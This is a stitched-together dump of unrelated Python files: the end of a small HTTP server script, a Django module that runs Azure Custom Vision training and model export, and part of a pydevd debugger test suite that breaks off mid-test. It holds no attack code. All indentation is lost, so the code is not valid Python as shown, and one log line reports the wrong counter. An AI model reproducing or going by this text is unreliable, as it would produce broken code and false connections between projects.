t = threading.Thread(target = lambda: hello_world(req))
t.start()
@server.define_route("/hello_world_async")
async def hello_world_async(req):
req.create_response().set_body("Hello world! (Async)").send()
@server.define_route(None)
def default_target(req):
req.create_response().set_body("Target not found").send()
server.listen()
while True:
time.sleep(10000000)
|
utils.py
|
"""App utilities.
"""
import json
import logging
import sys
import threading
import time
import traceback
from configs.general_configs import PRINT_THREAD
from ..azure_app_insight.utils import get_app_insight_logger
from ..azure_parts.models import Part
from ..azure_parts.utils import batch_upload_parts_to_customvision, upload_part_to_customvision_helper
from ..azure_settings.exceptions import SettingCustomVisionAccessFailed
from ..azure_settings.models import Setting
from ..azure_training_status import progress
from ..azure_training_status.utils import upcreate_training_status
from ..images.models import Image
from ..images.utils import upload_images_to_customvision_helper
from ..notifications.models import Notification
from .exceptions import ProjectAlreadyTraining, ProjectRemovedError
from .models import Project, Task
logger = logging.getLogger(__name__)
def update_app_insight_counter(
project_obj,
has_new_parts: bool,
has_new_images: bool,
parts_last_train: int,
images_last_train: int,
):
"""Send message to app insight."""
try:
retrain = train = 0
if has_new_parts:
logger.info("This is a training job")
train = 1
elif has_new_images:
logger.info("This is a re-training job")
retrain = 1
else:
logger.info("Project not changed")
logger.info(
"Sending Data to App Insight %s", project_obj.setting.is_collect_data
)
if project_obj.setting.is_collect_data:
logger.info("Sending Logs to App Insight")
trainer = project_obj.setting.get_trainer_obj()
images_now = trainer.get_tagged_image_count(project_obj.customvision_id)
parts_now = len(trainer.get_tags(project_obj.customvision_id))
# Traces
az_logger = get_app_insight_logger()
az_logger.warning(
"training",
extra={
"custom_dimensions": {
"train": train,
"images": images_now - images_last_train,
"parts": parts_now - parts_last_train,
"retrain": retrain,
}
},
)
except Exception:
logger.exception("update_app_insight_counter occur unexcepted error")
raise
def create_cv_project_helper(name: str, tags = None, project_type: str = None, classification_type: str = None):
setting_obj = Setting.objects.first()
inputs_ = [
{
"name": "data",
"metadata": {
"type": "image",
"shape": [1, 3, 416, 416],
"layout": ["N", "H", "W", "C"],
"color_format": "BGR",
}
}
]
inputs = json.dumps(inputs_)
project_obj = Project.objects.create(name=name, setting=setting_obj, is_demo=False, project_type=project_type, category="customvision", classification_type=classification_type, is_cascade=True, type="customvision_model", inputs=inputs)
logger.info("Creating Parts:")
for tag in tags:
logger.info("Creating Part: %s",tag)
part_obj, created = Part.objects.update_or_create(
project_id=project_obj.id,
name=tag,
description="",
)
# Make sure part is created
if not created:
logger.exception("%s not created", tag)
continue
logger.info("Create Part: %s Success!", tag)
logger.info("Creating CV project:")
project_obj.create_project(project_type=project_type, classification_type=classification_type)
logger.info("Uploading tags to CV project:")
part_ids = [part.id for part in Part.objects.filter(project=project_obj)]
has_new_parts = batch_upload_parts_to_customvision(
project_id=project_obj.id, part_ids=part_ids, tags_dict={}
)
# update node outputs
trainer = project_obj.setting.get_trainer_obj()
customvision_project_id = project_obj.customvision_id
tags = trainer.get_tags(customvision_project_id)
labels = []
for tag in tags:
labels.append(tag.name)
outputs_ = [
{
"name": "detection_out",
"metadata": {
"type": "bounding_box",
"shape": [1, 1, 200, 7],
"layout": [1, 1, "B", "F"],
"labels": labels,
}
}
]
project_obj.outputs = json.dumps(outputs_)
project_obj.save()
return(project_obj)
def update_tags_helper(project_id, tags=None):
project_obj = Project.objects.get(pk=project_id)
parts = Part.objects.filter(project=project_obj)
part_names = [part.name for part in parts]
part_ids = [part.id for part in parts]
to_add = []
to_delete = []
for tag in tags:
if tag not in part_names:
to_add.append(tag)
for part in parts:
if part.name not in tags:
to_delete.append(part.id)
logger.info("Creating Parts:")
for tag in to_add:
logger.info("Creating Part: %s",tag)
part_obj, created = Part.objects.update_or_create(
project_id=project_obj.id,
name=tag,
description="",
)
# Make sure part is created
if not created:
logger.exception("%s not created", tag)
continue
logger.info("Create Part: %s Success!", tag)
logger.info("Uploading tags to CV project:")
part_ids = [part.id for part in Part.objects.filter(project=project_obj)]
has_new_parts = batch_upload_parts_to_customvision(
project_id=project_obj.id, part_ids=part_ids, tags_dict={}
)
# delete part
for part_id in to_delete:
part_obj = Part.objects.filter(pk=part_id).first()
part_obj.delete_on_customvision = True
part_obj.delete()
def pull_cv_project_helper(customvision_project_id: str, is_partial: bool):
"""pull_cv_project_helper.
Args:
customvision_project_id (str): customvision_project_id
is_partial (bool): is_partial
"""
logger.info("pull_cv_project_helper")
logger.info("customvision_project_id: %s", customvision_project_id)
logger.info("is_partial %s", is_partial)
# Get project objects
#TODO need to resolve hard-coded pk=20
# project_obj_template = Project.objects.get(pk=12)
setting_obj = Setting.objects.first()
inputs_ = [
{
"name": "data",
"metadata": {
"type": "image",
"shape": [1, 3, 416, 416],
"layout": ["N", "H", "W", "C"],
"color_format": "BGR",
}
}
]
inputs = json.dumps(inputs_)
project_obj = Project.objects.create(
setting=setting_obj,
is_demo=False,
category="customvision",
is_cascade=True,
type="customvision_model",
inputs=inputs,
)
# Check Training_Key, Endpoint
if not project_obj.setting.is_trainer_valid:
raise SettingCustomVisionAccessFailed
trainer = project_obj.setting.get_trainer_obj()
# Check Customvision Project id
try:
trainer.get_project(customvision_project_id)
except Exception:
raise ProjectRemovedError
# Invalid CustomVision Project ID handled by exception
project_obj.name = trainer.get_project(project_id=customvision_project_id).name
project_obj.setting.domain_id = trainer.get_project(customvision_project_id).settings.domain_id
project_obj.project_type = trainer.get_domain(trainer.get_project(customvision_project_id).settings.domain_id).type
if project_obj.project_type == "Classification":
project_obj.classification_type = trainer.get_project(customvision_project_id).settings.classification_type
project_obj.customvision_id = customvision_project_id
# Delete parts and images
logger.info("Deleting all parts and images...")
logger.info("Handle by signals...")
# Download parts and images
logger.info("Pulling Parts...")
counter = 0
# update node outputs
tags = trainer.get_tags(customvision_project_id)
labels = []
for tag in tags:
labels.append(tag.name)
outputs_ = [
{
"name": "detection_out",
"metadata": {
"type": "bounding_box",
"shape": [1, 1, 200, 7],
"layout": [1, 1, "B", "F"],
"labels": labels,
}
}
]
project_obj.outputs = json.dumps(outputs_)
project_obj.save()
for tag in tags:
logger.info("Creating Part %s: %s %s", counter, tag.name, tag.description)
part_obj, created = Part.objects.update_or_create(
project_id=project_obj.id,
name=tag.name,
description=tag.description if tag.description else "",
customvision_id=tag.id,
)
# Make sure part is created
if not created:
logger.exception("%s not created", tag.name)
continue
logger.info(
"Create Part %s: %s %s Success!", counter, tag.name, tag.description
)
counter += 1
# Download one image as icon
if is_partial:
logger.info("Try to download one image as icon.")
# Image file
imgs_with_tag = trainer.get_tagged_images(
project_id=customvision_project_id, tag_ids=[tag.id], take=1
)
if len(imgs_with_tag) < 1:
logger.info("This tag does not have an image")
continue
img = imgs_with_tag[0]
img_obj, created = Image.objects.update_or_create(
part=part_obj,
remote_url=img.original_image_uri,
customvision_id=img.id,
project_id=project_obj.id,
uploaded=True,
manual_checked=True,
)
try:
img_obj.get_remote_image()
except Exception:
logger.exception("Download remote image occur exception.")
logger.exception("Image discarded...")
img_obj.delete()
continue
# Image Labels
logger.info("Finding region with tag (%s, %s)", tag.name, tag.id)
for region in img.regions:
if region.tag_id == tag.id:
logger.info("Region Found")
img_obj.set_labels(
left=region.left,
top=region.top,
width=region.width,
height=region.height,
tag_id=img_obj.part.pk,
)
break
logger.info("Pulled %s Parts... End", counter)
# Partial Download
if is_partial:
exporting_task_obj = Task.objects.create(
task_type="export_iteration",
status="init",
log="Just Started",
project=project_obj,
)
exporting_task_obj.start_exporting()
return
# Full Download
logger.info("Pulling Tagged Images...")
img_counter = 0
imgs_count = trainer.get_tagged_image_count(project_id=customvision_project_id)
img_batch_size = 50
img_index = 0
while img_index <= imgs_count:
logger.info("Img Index: %s. Img Count: %s", img_index, imgs_count)
imgs = trainer.get_tagged_images(
project_id=customvision_project_id, take=img_batch_size, skip=img_index
)
for img in imgs:
logger.info("*** img %s", img_counter)
img_obj, created = Image.objects.update_or_create(
remote_url=img.original_image_uri,
project=project_obj,
customvision_id=img.id,
manual_checked=True,
)
img_id = img_obj.id
if created:
# logger.info("Downloading img %s", img.id)
# img_obj.get_remote_image()
# logger.info("Setting label of %s", img.id)
# img_obj.set_labels(
# left=region.left,
# top=region.top,
# width=region.width,
# height=region.height,
# tag_id=img_obj.part.pk,
# )
img_counter += 1
for region in img.regions:
part_objs = Part.objects.filter(
name=region.tag_name, project_id=project_obj.id
)
if not part_objs.exists():
continue
part_obj = part_objs.first()
logger.info("Adding label to %s", img.id)
# img_obj = Image.objects.get(pk=img_id)
img_obj.part = part_obj
img_obj.get_remote_image()
img_obj.set_labels(
left=region.left,
top=region.top,
width=region.width,
height=region.height,
tag_id=part_obj.id,
)
img_index += img_batch_size
logger.info("Pulled %s images", counter)
logger.info("Pulling Tagged Images... End")
logger.info("Pulling Custom Vision Project... End")
def train_project_worker(project_id):
"""train_project_worker.
Args:
project_id: Django ORM project id
"""
# =====================================================
    # 0. Bypass projects that need no training ===
# =====================================================
project_obj = Project.objects.get(pk=project_id)
logger.info("Project id: %s", project_obj.id)
if project_obj.is_demo:
logger.info("Demo project is already trained")
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_0_OK,
)
return
if project_obj.is_prediction_module:
logger.info("Prediction Module need no train.")
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_0_OK,
)
return
# =====================================================
# 0. Get Project in Django ===
# =====================================================
if not project_obj.setting or not project_obj.setting.is_trainer_valid:
upcreate_training_status(
project_id=project_obj.id, status="Failed", log="Custom Vision Access Error"
)
return
# =====================================================
# 1. Prepare Custom Vision Client ===
# =====================================================
trainer = project_obj.setting.get_trainer_obj()
customvision_project_id = project_obj.customvision_id
project_obj.dequeue_iterations()
part_ids = [part.id for part in Part.objects.filter(project=project_obj)]
logger.info("Part ids: %s", part_ids)
# =====================================================
# 2. Get/Create Project on Custom Vision ===
# =====================================================
try:
trainer.get_project(customvision_project_id)
upcreate_training_status(
project_id=project_obj.id,
status="preparing",
log=(f"Project {project_obj.name} " + "found on Custom Vision"),
)
except Exception:
project_obj.create_project()
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_2_PROJECT_CREATED,
)
project_obj = Project.objects.get(pk=project_id)
logger.info("Project created on Custom Vision.")
logger.info("Project Id: %s", project_obj.customvision_id)
logger.info("Project Name: %s", project_obj.name)
# =====================================================
# 3. Upload parts ===
# =====================================================
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_3_UPLOADING_PARTS,
)
# Get tags_dict to avoid getting tags every time
tags = trainer.get_tags(project_id=project_obj.customvision_id)
tags_dict = {tag.name: tag.id for tag in tags}
# App Insight
project_changed = False
has_new_parts = False
has_new_images = False
parts_last_train = len(tags)
images_last_train = trainer.get_tagged_image_count(project_obj.customvision_id)
# Create/update tags on Custom Vision Project
has_new_parts = batch_upload_parts_to_customvision(
project_id=project_id, part_ids=part_ids, tags_dict=tags_dict
)
if has_new_parts:
project_changed = True
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_4_UPLOADING_IMAGES,
)
# =====================================================
# 4. Upload images to Custom Vision Project ===
# =====================================================
for part_id in part_ids:
logger.info("Uploading images with part_id %s", part_id)
has_new_images = upload_images_to_customvision_helper(
project_id=project_obj.id, part_id=part_id
)
if has_new_images:
project_changed = True
# =====================================================
# 5. Submit Training Task to Custom Vision ===
# =====================================================
logger.info("Submit Training Task")
if not project_changed:
logger.info("Project not changed. Not Training!")
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_10_NO_CHANGE,
)
return
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_5_SUBMITTING_TRAINING_TASK,
)
training_task_submit_success = project_obj.train_project()
# App Insight
if training_task_submit_success:
update_app_insight_counter(
project_obj=project_obj,
has_new_parts=has_new_parts,
has_new_images=has_new_images,
parts_last_train=parts_last_train,
images_last_train=images_last_train,
)
# =====================================================
# 6. Training (Finding Iteration) ===
# =====================================================
logger.info("Finding Iteration")
customvision_id = project_obj.customvision_id
wait_prepare = 0
max_wait_prepare = 60
status_init = False
while True:
time.sleep(1)
wait_prepare += 1
iterations = trainer.get_iterations(customvision_id)
if not status_init:
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_6_PREPARING_CUSTOM_VISION_ENV,
)
status_init = True
if len(iterations) > 0:
logger.info("Iteration Found %s", iterations[0])
break
if wait_prepare > max_wait_prepare:
logger.info("Something went wrong...")
upcreate_training_status(
project_id=project_obj.id,
status="Failed",
log="Get iteration from Custom Vision occurs error.",
need_to_send_notification=True,
)
break
# =====================================================
# 6. Training (Waiting) ===
# =====================================================
logger.info("Training")
status_init = False
while True:
time.sleep(1)
iterations = trainer.get_iterations(customvision_id)
iteration = iterations[0]
if not status_init:
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_7_TRAINING,
)
status_init = True
if iteration.exportable and iteration.status == "Completed":
break
logger.info("Still training...")
# =====================================================
# 7. Exporting ===
# =====================================================
status_init = False
while True:
time.sleep(1)
if not status_init:
upcreate_training_status(
project_id=project_obj.id,
need_to_send_notification=True,
**progress.PROGRESS_8_EXPORTING,
)
status_init = True
try:
project_obj.export_iteration(iteration.id)
except Exception:
logger.exception("Export already in queue")
try:
project_obj.export_iteration(iteration.id, flavor="ONNXFloat16")
except Exception:
logger.exception("Export already in queue")
try:
project_obj.export_iteration(iteration.id, platform="OPENVINO")
except Exception:
logger.exception("Export already in queue")
try:
exports = project_obj.get_exports(iteration.id)
except Exception:
logger.exception("get_exports exception")
continue
if (
len(exports) < 2
or not exports[0].download_uri
or not exports[1].download_uri
):
logger.info("Status: exporting model")
continue
break
# =====================================================
# 8. Saving model and performance ===
# =====================================================
logger.info("Successfully export model: %s", project_obj.download_uri)
logger.info("Training about to completed.")
exports = trainer.get_exports(customvision_id, iteration.id)
for export in exports:
if export.flavor:
project_obj.download_uri_fp16 = export.download_uri
else:
if "onnx" in export.platform.lower():
project_obj.download_uri = export.download_uri
else:
project_obj.download_uri_openvino = export.download_uri
# if not exports[0].flavor:
# project_obj.download_uri = exports[0].download_uri
# project_obj.download_uri_fp16 = exports[1].download_uri
# else:
# project_obj.download_uri = exports[1].download_uri
# project_obj.download_uri_fp16 = exports[0].download_uri
train_performance_list = []
for iteration in iterations[:2]:
train_performance_list.append(
trainer.get_iteration_performance(customvision_id, iteration.id).as_dict()
)
upcreate_training_status(
project_id=project_obj.id,
performance=json.dumps(train_performance_list),
need_to_send_notification=True,
**progress.PROGRESS_9_SUCCESS,
)
logger.info("Training Performance: %s", train_performance_list)
# =====================================================
# 0. End ===
# =====================================================
if has_new_parts:
logger.info("This is a training job")
project_obj.training_counter += 1
elif has_new_images:
logger.info("This is a re-training job")
project_obj.retraining_counter += 1
project_obj.save()
def train_project_catcher(project_id):
"""train_project_catcher.
Dummy exception handler.
Args:
project_id:
"""
try:
train_project_worker(project_id=project_id)
except Exception:
upcreate_training_status(
project_id=project_id,
status="Failed",
log=traceback.format_exc(),
need_to_send_notification=True,
)
class TrainingManager:
"""TrainingManager."""
def __init__(self):
"""__init__."""
self.training_tasks = {}
self.mutex = threading.Lock()
self.garbage_collector()
    def add(self, project_id):
        """add.
        Add a project to the training tasks and start a worker thread for it.
        Raises ProjectAlreadyTraining if the project is already queued.
        """
        with self.mutex:
            if project_id in self.training_tasks:
                raise ProjectAlreadyTraining
            task = TrainingTask(project_id=project_id)
            self.training_tasks[project_id] = task
            task.start()
    def get_task_by_id(self, project_id):
        """get_task_by_id.
        Return the TrainingTask for project_id, or None if it is not training.
        """
        with self.mutex:
            return self.training_tasks.get(project_id)
def garbage_collector(self):
"""garbage_collector.
        IMPORTANT: the autoreloader does not reload running threads;
        restart the server if you modify this thread.
"""
def _gc(self):
while True:
self.mutex.acquire()
if PRINT_THREAD:
logger.info("tasks: %s", self.training_tasks)
to_delete = []
for project_id in self.training_tasks:
if not self.training_tasks[project_id].worker.is_alive():
logger.info("Project %s Training Task is finished", project_id)
to_delete.append(project_id)
for project_id in to_delete:
del self.training_tasks[project_id]
self.mutex.release()
time.sleep(3)
threading.Thread(target=_gc, args=(self,), daemon=True).start()
class TrainingTask:
"""TrainingTask."""
def __init__(self, project_id):
"""__init__.
Args:
            project_id: Django ORM project id
"""
self.project_id = project_id
self.status = "init"
self.worker = None
def start(self):
"""start."""
self.status = "running"
self.worker = threading.Thread(
target=train_project_catcher,
name=f"train_project_worker_{self.project_id}",
kwargs={"project_id": self.project_id},
daemon=True,
)
self.worker.start()
def __str__(self):
return "<Training Task " + str(self.project_id) + ">"
def __repr__(self):
return "<Training Task " + str(self.project_id) + ">"
if "runserver" in sys.argv:
TRAINING_MANAGER = TrainingManager()
else:
TRAINING_MANAGER = None
test_debugger.py
# coding: utf-8
'''
The idea is that we record the commands sent to the debugger and reproduce them from this script
(so, this works as the client, which spawns the debugger as a separate process and communicates
to it as if it was run from the outside)
Note that it's a python script but it'll spawn a process to run as jython, ironpython and as python.
'''
import time
import pytest
from tests_python import debugger_unittest
from tests_python.debugger_unittest import (CMD_SET_PROPERTY_TRACE, REASON_CAUGHT_EXCEPTION,
REASON_UNCAUGHT_EXCEPTION, REASON_STOP_ON_BREAKPOINT, REASON_THREAD_SUSPEND, overrides, CMD_THREAD_CREATE,
CMD_GET_THREAD_STACK, REASON_STEP_INTO_MY_CODE, CMD_GET_EXCEPTION_DETAILS, IS_IRONPYTHON, IS_JYTHON, IS_CPYTHON,
IS_APPVEYOR, wait_for_condition, CMD_GET_FRAME, CMD_GET_BREAKPOINT_EXCEPTION,
CMD_THREAD_SUSPEND, CMD_STEP_OVER, REASON_STEP_OVER, CMD_THREAD_SUSPEND_SINGLE_NOTIFICATION,
CMD_THREAD_RESUME_SINGLE_NOTIFICATION, REASON_STEP_RETURN, REASON_STEP_RETURN_MY_CODE,
REASON_STEP_OVER_MY_CODE, REASON_STEP_INTO, CMD_THREAD_KILL, IS_PYPY)
from _pydevd_bundle.pydevd_constants import IS_WINDOWS
from _pydevd_bundle.pydevd_comm_constants import CMD_RELOAD_CODE
import json
import pydevd_file_utils
import subprocess
import threading
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
from tests_python.debug_constants import * # noqa
pytest_plugins = [
str('tests_python.debugger_fixtures'),
]
try:
xrange
except:
xrange = range
if IS_PY2:
builtin_qualifier = "__builtin__"
else:
builtin_qualifier = "builtins"
@pytest.mark.skipif(not IS_CPYTHON, reason='Test needs gc.get_referrers/reference counting to really check anything.')
def test_case_referrers(case_setup):
with case_setup.test_file('_debugger_case1.py') as writer:
writer.log.append('writing add breakpoint')
writer.write_add_breakpoint(6, 'set_up')
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.log.append('get frame')
writer.write_get_frame(thread_id, frame_id)
writer.log.append('step over')
writer.write_step_over(thread_id)
writer.log.append('get frame')
writer.write_get_frame(thread_id, frame_id)
writer.log.append('run thread')
writer.write_run_thread(thread_id)
writer.log.append('asserting')
try:
assert 13 == writer._sequence, 'Expected 13. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
def test_case_2(case_setup):
with case_setup.test_file('_debugger_case2.py') as writer:
writer.write_add_breakpoint(3, 'Call4') # seq = 3
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id) # Note: write get frame but not waiting for it to be gotten.
writer.write_add_breakpoint(14, 'Call2')
writer.write_run_thread(thread_id)
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id) # Note: write get frame but not waiting for it to be gotten.
writer.write_run_thread(thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 15 == writer._sequence, 'Expected 15. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.parametrize(
'skip_suspend_on_breakpoint_exception, skip_print_breakpoint_exception',
(
[['NameError'], []],
[['NameError'], ['NameError']],
[[], []], # Empty means it'll suspend/print in any exception
[[], ['NameError']],
[['ValueError'], ['Exception']],
[['Exception'], ['ValueError']], # ValueError will also suspend/print since we're dealing with a NameError
)
)
def test_case_breakpoint_condition_exc(case_setup, skip_suspend_on_breakpoint_exception, skip_print_breakpoint_exception):
msgs_in_stderr = (
'Error while evaluating expression: i > 5',
'Traceback (most recent call last):',
'File "<string>", line 1, in <module>',
)
# It could be one or the other in PyPy depending on the version.
msgs_one_in_stderr = (
"NameError: name 'i' is not defined",
"global name 'i' is not defined",
)
def _ignore_stderr_line(line):
if original_ignore_stderr_line(line):
return True
for msg in msgs_in_stderr + msgs_one_in_stderr:
if msg in line:
return True
return False
def additional_output_checks(stdout, stderr):
original_additional_output_checks(stdout, stderr)
if skip_print_breakpoint_exception in ([], ['ValueError']):
for msg in msgs_in_stderr:
assert msg in stderr
for msg in msgs_one_in_stderr:
if msg in stderr:
break
else:
raise AssertionError('Did not find any of: %s in stderr: %s' % (
msgs_one_in_stderr, stderr))
else:
for msg in msgs_in_stderr + msgs_one_in_stderr:
assert msg not in stderr
with case_setup.test_file('_debugger_case_breakpoint_condition_exc.py') as writer:
original_ignore_stderr_line = writer._ignore_stderr_line
writer._ignore_stderr_line = _ignore_stderr_line
original_additional_output_checks = writer.additional_output_checks
writer.additional_output_checks = additional_output_checks
writer.write_suspend_on_breakpoint_exception(skip_suspend_on_breakpoint_exception, skip_print_breakpoint_exception)
breakpoint_id = writer.write_add_breakpoint(
writer.get_line_index_with_content('break here'), 'Call', condition='i > 5')
writer.write_make_initial_run()
if skip_suspend_on_breakpoint_exception in ([], ['ValueError']):
writer.wait_for_message(CMD_GET_BREAKPOINT_EXCEPTION)
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
if IS_JYTHON:
# Jython will break twice.
if skip_suspend_on_breakpoint_exception in ([], ['ValueError']):
writer.wait_for_message(CMD_GET_BREAKPOINT_EXCEPTION)
hit = writer.wait_for_breakpoint_hit()
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
msg = writer.wait_for_message(CMD_GET_FRAME)
name_to_value = {}
for var in msg.var:
name_to_value[var['name']] = var['value']
assert name_to_value == {'i': 'int: 6', 'last_i': 'int: 6'}
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(thread_id)
writer.finished_ok = True
def test_case_remove_breakpoint(case_setup):
with case_setup.test_file('_debugger_case_remove_breakpoint.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_double_remove_breakpoint(case_setup):
with case_setup.test_file('_debugger_case_remove_breakpoint.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'))
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_remove_breakpoint(breakpoint_id) # Double-remove (just check that we don't have an error).
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON, reason='This test fails once in a while due to timing issues on IronPython, so, skipping it.')
def test_case_3(case_setup):
with case_setup.test_file('_debugger_case3.py') as writer:
writer.write_make_initial_run()
time.sleep(.5)
breakpoint_id = writer.write_add_breakpoint(4, '')
writer.write_add_breakpoint(5, 'FuncNotAvailable') # Check that it doesn't get hit in the global when a function is available
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
writer.write_run_thread(thread_id)
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(thread_id)
assert 17 == writer._sequence, 'Expected 17. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_suspend_thread(case_setup):
with case_setup.test_file('_debugger_case4.py') as writer:
writer.write_make_initial_run()
thread_id = writer.wait_for_new_thread()
writer.write_suspend_thread(thread_id)
while True:
hit = writer.wait_for_breakpoint_hit((REASON_THREAD_SUSPEND, REASON_STOP_ON_BREAKPOINT))
if hit.name == 'sleep':
break # Ok, broke on 'sleep'.
else:
# i.e.: if it doesn't hit on 'sleep', release and pause again.
writer.write_run_thread(thread_id)
time.sleep(.1)
writer.write_suspend_thread(thread_id)
assert hit.thread_id == thread_id
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'exit_while_loop()')
writer.wait_for_evaluation([
[
'<var name="exit_while_loop()" type="str" qualifier="{0}" value="str: ok'.format(builtin_qualifier),
'<var name="exit_while_loop()" type="str" value="str: ok"', # jython
]
])
writer.write_run_thread(thread_id)
writer.finished_ok = True
# Jython has a weird behavior: it seems it has fine-grained locking so that when
# we're inside the tracing other threads don't run (so, we can have only one
# thread paused in the debugger).
@pytest.mark.skipif(IS_JYTHON, reason='Jython can only have one thread stopped at each time.')
def test_case_suspend_all_thread(case_setup):
with case_setup.test_file('_debugger_case_suspend_all.py') as writer:
writer.write_make_initial_run()
main_thread_id = writer.wait_for_new_thread() # Main thread
thread_id1 = writer.wait_for_new_thread() # Thread 1
thread_id2 = writer.wait_for_new_thread() # Thread 2
# Ok, all threads created, let's wait for the main thread to get to the join.
writer.wait_for_thread_join(main_thread_id)
writer.write_suspend_thread('*')
# Wait for 2 threads to be suspended (the main thread is already in a join, so, it can't actually
# break out of it while others don't proceed).
hit0 = writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
hit1 = writer.wait_for_breakpoint_hit(REASON_THREAD_SUSPEND)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit0.thread_id, hit0.frame_id, 'LOCAL'), 'exit_while_loop(1)')
writer.wait_for_evaluation([
[
'<var name="exit_while_loop(1)" type="str" qualifier="{0}" value="str: ok'.format(builtin_qualifier)
]
])
writer.write_evaluate_expression('%s\t%s\t%s' % (hit1.thread_id, hit1.frame_id, 'LOCAL'), 'exit_while_loop(2)')
writer.wait_for_evaluation('<var name="exit_while_loop(2)" type="str" qualifier="{0}" value="str: ok'.format(builtin_qualifier))
writer.write_run_thread('*')
writer.finished_ok = True
def test_case_5(case_setup):
with case_setup.test_file('_debugger_case56.py') as writer:
breakpoint_id = writer.write_add_breakpoint(2, 'Call2')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
writer.write_remove_breakpoint(breakpoint_id)
writer.write_step_return(thread_id)
hit = writer.wait_for_breakpoint_hit('109')
thread_id = hit.thread_id
frame_id = hit.frame_id
line = hit.line
assert line == 8, 'Expecting it to go to line 8. Went to: %s' % line
writer.write_step_in(thread_id)
hit = writer.wait_for_breakpoint_hit('107')
thread_id = hit.thread_id
frame_id = hit.frame_id
line = hit.line
# goes to line 4 in jython (function declaration line)
assert line in (4, 5), 'Expecting it to go to line 4 or 5. Went to: %s' % line
writer.write_run_thread(thread_id)
assert 15 == writer._sequence, 'Expected 15. Had: %s' % writer._sequence
writer.finished_ok = True
def test_case_6(case_setup):
with case_setup.test_file('_debugger_case56.py') as writer:
writer.write_add_breakpoint(2, 'Call2')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_get_frame(thread_id, frame_id)
writer.write_step_return(thread_id)
hit = writer.wait_for_breakpoint_hit('109')
thread_id = hit.thread_id
frame_id = hit.frame_id
line = hit.line
assert line == 8, 'Expecting it to go to line 8. Went to: %s' % line
writer.write_step_in(thread_id)
hit = writer.wait_for_breakpoint_hit('107')
thread_id = hit.thread_id
frame_id = hit.frame_id
line = hit.line
# goes to line 4 in jython (function declaration line)
assert line in (4, 5), 'Expecting it to go to line 4 or 5. Went to: %s' % line
writer.write_run_thread(thread_id)
        assert 13 == writer._sequence, 'Expected 13. Had: %s' % writer._sequence
writer.finished_ok = True
@pytest.mark.skipif(IS_IRONPYTHON, reason='This test is flaky on IronPython, so, skipping it.')
def test_case_7(case_setup):
# This test checks that we start without variables and at each step a new var is created, but on ironpython,
# the variables exist all at once (with None values), so, we can't test it properly.
with case_setup.test_file('_debugger_case_local_variables.py') as writer:
writer.write_add_breakpoint(writer.get_line_index_with_content('Break here'), 'Call')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit('111')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars('<xml></xml>') # no vars at this point
writer.write_step_over(hit.thread_id)
writer.wait_for_breakpoint_hit('108')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars([
[
'<xml><var name="variable_for_test_1" type="int" qualifier="{0}" value="int%253A 10" />%0A</xml>'.format(builtin_qualifier),
'<var name="variable_for_test_1" type="int" value="int', # jython
]
])
writer.write_step_over(hit.thread_id)
writer.wait_for_breakpoint_hit('108')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars([
[
